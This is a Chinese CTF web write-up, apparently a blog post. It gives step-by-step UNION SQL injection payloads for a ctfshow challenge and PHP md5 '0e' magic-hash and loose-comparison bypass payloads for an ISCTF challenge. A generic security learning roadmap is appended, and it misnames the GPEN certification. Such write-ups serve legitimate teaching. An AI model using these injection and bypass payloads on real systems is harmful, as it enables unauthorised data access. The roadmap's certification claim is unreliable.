ctfweb学习心得

ctfshow_2020_web_02 WP
考查点:

    基本的SQL注入
    多表联合查询

在用户名处注入sql语句,密码随意
1.查当前数据库名称

 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 

得到数据库名称web2
2.查看数据库表的数量

' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'),3 limit 1,2;#-- 

得到数据库表数量为2
3.查表的名字

第一个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 0,1),3 limit 1,2;#-- 

得到表名:flag 
第二个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 1,2),3 limit 1,2;#-- 

得到表名:user
4.查flag表列的数量

' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#-- 

只有1列
5.查flag表列的名字

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#-- 

列名为flag
6.查flag表记录的数量

' or 1=1 union select 1,(select count(*) from flag),3 limit 1,2;#-- 

只有一条记录
7.查flag表记录值

' or 1=1 union select 1,(select flag from flag limit 0,1),3 limit 1,2;#-- 

得到flag

ISCTF

EASY-PHP02

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
$flag = "flag{need_time_to_change}";
include_once("config.php");
$YOUR_NAME = $_GET["NAME"];
$GET1 = $_POST["GET1"];
$GET2 = $_POST["GET2"];
$POST1 = $_GET["P0ST1"];
$POST2 = $_GET["P0ST2"];
if (isset($YOUR_NAME)){
    echo $YOUR_NAME.",请开始你的答题。"."<br>";
}
else{
    echo "做题前请告诉我你是小蓝鲨吗?";
    exit();
}
if (is_numeric($POST1)){
    if ($_GET["P0ST1"] != $_GET["P0ST2"]){
        
        if (($_GET["P0ST1"]) == md5($_GET["P0ST2"])){

                $f1=$flag1;
                echo "小蓝鲨成功一半".$f1;              
            }
    }
}

if(preg_match('/^[0-9]*$/',$GET1)) {
exit();
}
else{
    if( $GET1 == 0 ){
        echo "<br>"."前面的出来了吗?";
        if(is_numeric($GET2)){
            exit();
        }
        if($GET2 > 678){
            echo "答案就在眼前?"."<br>".$YOUR_NAME.",你觉得这是flag吗?"."<br>";     
            $Ag=base64_encode($flag2);
            }
    }
}
$flag666 = $f1.$Ag;
echo $flag666;
?>
做题前请告诉我你是小蓝鲨吗?
 

if (isset($YOUR_NAME)){
    echo $YOUR_NAME.",请开始你的答题。"."<br>";

第一个判断就是GET传个NAME就不细写了

if (is_numeric($POST1)){
    if ($_GET["P0ST1"] != $_GET["P0ST2"]){
       if (($_GET["P0ST1"]) == md5($_GET["P0ST2"])){

                $f1=$flag1;
                echo "小蓝鲨成功一半".$f1;              
            }
    }
}

这里要求$POST1为数字,P0ST1和P0ST2不相等,而且P0ST1等于P0ST2的md5值。

这里用到了PHP特性的知识,md5的比较。

原理:

在 php 中,当字符串 以0e开头时,会被 php 识别成科学计数法,会被认为是数字。

下面列出几个常用的MD5值以0e开头的字符串:

字符串    MD5值
QNKCDZO    0e830400451993494058024219903391
s878926199a    0e545993274517709034328855841020
s155964671a    0e342768416822451524974117254469
s214587387a    0e848240448830537924465865611904
s214587387a    0e848240448830537924465865611904
s878926199a    0e545993274517709034328855841020
s1091221200a    0e940624217856561557816327384675
Payload1:?NAME=11&P0ST1= 0e830400451993494058024219903391&P0ST2=QNKCDZO  

if(preg_match('/^[0-9]*$/',$GET1)) {
exit();
}
if( $GET1 == 0 ){
        echo "<br>"."前面的出来了吗?";
        if(is_numeric($GET2)){
            exit();
        }
        if($GET2 > 678){
            echo "答案就在眼前?"."<br>".$YOUR_NAME.",你觉得这是flag吗?"."<br>";     
            $Ag=base64_encode($flag2);
            }
    }

这里需要$GET1不能为数字,而且$GET1又等于0,并且$GET2不能为数字,值大于678。

原理:

php 的 0 与任何字符串比较都为 true,因为字符串被强制转换后都成了 0。

Payload2:GET1=qwe&GET2=679a
 

  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF (Capture the Flag) 中的 Web 部分通常指的是 Web 漏洞挖掘、Web 安全攻防和渗透测试等内容。如果你想要学习这个方向,可以按照以下步骤规划你的学习路线: 1. **基础知识**: - 学习 HTML/CSS/JavaScript:这是构建网站的基础,理解它们的工作原理对于发现 Web 应用程序的漏洞至关重要。 - 熟悉HTTP协议和TCP/IP:了解网络通信原理有助于理解 Web 安全。 2. **Web安全基础**: - 学习 OWASP Top 10:这列出了常见的 Web 安全威胁,如SQL注入、XSS攻击等。 - 掌握基本的安全工具:如Burp Suite、Nmap等用于扫描和分析网络服务。 3. **Web应用框架和服务器端语言**: - Python Flask/Django、Node.js Express等:了解如何构建 Web 应用,熟悉其内部结构。 - PHP、ASP.NET等:了解常见 Web 开发语言的特性和可能存在的安全隐患。 4. **漏洞发掘与利用**: - 学习如何识别和利用各种Web漏洞,如CSRF、文件包含漏洞等。 - 参加OWASP WebGoat或其他在线课程练习实战。 5. **渗透测试**: - 获取渗透测试相关的认证,如CEH (Certified Ethical Hacker) 或 GPEN (Giacomelli Penetration Tester)。 - 使用Kali Linux或类似系统进行渗透实验。 6. **实践项目**: - 参与线上比赛或社区的 CTF 比赛,不断锻炼实战能力。 - 尝试修复已知的漏洞或构建安全策略,提升防御意识。 7. **持续跟进**: - 关注最新的 Web 安全动态和技术更新,关注网络安全博客和论坛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值